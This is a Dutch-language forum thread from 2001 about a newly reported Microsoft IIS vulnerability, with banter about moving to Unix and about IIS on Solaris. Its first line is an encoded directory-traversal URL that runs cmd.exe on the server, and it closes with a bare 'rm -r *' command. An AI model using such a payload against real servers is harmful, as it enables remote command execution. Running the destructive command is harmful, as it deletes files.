/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Misschien naar Unix overstappen ipv NT met IIS?
Verwijderd
Yo dawg, I heard you like posts so I posted below your post so you can post again.
Ja duh! Dit is toch een retorische vraag of niet? (ook een retorische vraagOp woensdag 16 mei 2001 19:09 schreef tweakerrrr het volgende:
[deze advertentieruimte is te koop]
Yo dawg, I heard you like posts so I posted below your post so you can post again.
Verwijderd
Het zal wel niet, maar het zou maar wel.
En hoe zou dat toch komenOp woensdag 16 mei 2001 23:14 schreef Jotti het volgende:
Dit mag dan weinig met Non-Windows OS''en te maken hebben... uit statistieken blijkt dat dit soort dingen erg geliefd zijn bij ''ons''...
Mwoah.. het is mijn hobby, ik turf de bugsOp woensdag 16 mei 2001 22:59 schreef JayTaph het volgende:
>Erg nieuw ja, een maand of 3?
Nee, dit is alweer een andere :-)
Ik zag em vandaag ook staan op securityinfo, maar der zaten wat ristricties aan geloof ik maar dat moet ik eventjes nakijken.. IIS interesseert me niet zoveel (tenzij je van gatenkaas houdt)..
"Happiness is a way of travel, not a destination."
--Roy Goodman
Er is een explorer op Solaris, maar dat is geen Browser. Dat is een (vooral voor Sun) handig tooltje om informatie over een Solaris bak te verzamelen.Op woensdag 16 mei 2001 23:12 schreef JayTaph het volgende:
IIS draait toch ook op solaris, of was dat alleen explorer?
rm -r *